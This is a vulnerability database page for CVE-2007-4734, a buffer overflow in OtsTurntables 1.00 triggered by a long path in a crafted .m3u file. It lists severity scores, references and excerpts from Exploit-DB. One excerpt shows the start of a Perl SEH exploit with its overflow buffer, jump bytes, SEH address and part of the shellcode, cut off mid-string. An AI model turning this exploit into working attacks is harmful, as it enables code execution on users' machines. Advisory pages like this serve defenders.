CVE-2007-4734
published 2007-09-06CVE-2007-4734: Buffer overflow in Ots Labs OTSTurntables 1.00 allows user-assisted remote attackers to execute arbitrary code via a long file path in an m3u file.
PriorityP419medium4.3CVSS 2.0
AVNACMAuNCNINAP
EXPLOIT
EPSS
5.59%
91.9th percentile
Buffer overflow in Ots Labs OTSTurntables 1.00 allows user-assisted remote attackers to execute arbitrary code via a long file path in an m3u file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ots_labs | otsturntables | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
OtsTurntables 1.00.027 - '.m3u' / '.ofl' Universal Local Buffer Overflow (SEH)
exploitdb·2009-09-04
CVE-2007-4734 OtsTurntables 1.00.027 - '.m3u' / '.ofl' Universal Local Buffer Overflow (SEH)
OtsTurntables 1.00.027 - '.m3u' / '.ofl' Universal Local Buffer Overflow (SEH)
---
#!/usr/bin/perl
# by hack4love
# [email protected]
# OtsTurntables Free 1.00.027 (.m3u/ ofl File) Local Universal BOF Exploit (SEH)
#--->> info:: 1.00.027 was released 3 March 2008
###http://www.brothersoft.com/otsturntables-free-download-86957.html
## Original exploit::http://www.milw0rm.com/exploits/8371
##################################################################
my $bof="\x41" x 884;
my $nsh="\xEB\x06\x90\x90";
my $seh="\xb8\x15\xd1\x72";#TEST UNDER SP2///SP3
my $nop="\x90" x 20;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x
Exploit-DB
OtsTurntables 1.00 - '.m3u' Local Buffer Overflow
exploitdb·2007-09-02
CVE-2007-4734 OtsTurntables 1.00 - '.m3u' Local Buffer Overflow
OtsTurntables 1.00 - '.m3u' Local Buffer Overflow
---
";
?>
# milw0rm.com [2007-09-02]
No writeups or analysis indexed.
http://osvdb.org/40173http://secunia.com/advisories/26667http://www.exploit-db.com/exploits/9589http://www.securityfocus.com/bid/25514http://www.vupen.com/english/advisories/2007/3043https://exchange.xforce.ibmcloud.com/vulnerabilities/36429https://www.exploit-db.com/exploits/4355http://osvdb.org/40173http://secunia.com/advisories/26667http://www.exploit-db.com/exploits/9589http://www.securityfocus.com/bid/25514http://www.vupen.com/english/advisories/2007/3043https://exchange.xforce.ibmcloud.com/vulnerabilities/36429https://www.exploit-db.com/exploits/4355
2007-09-06
Published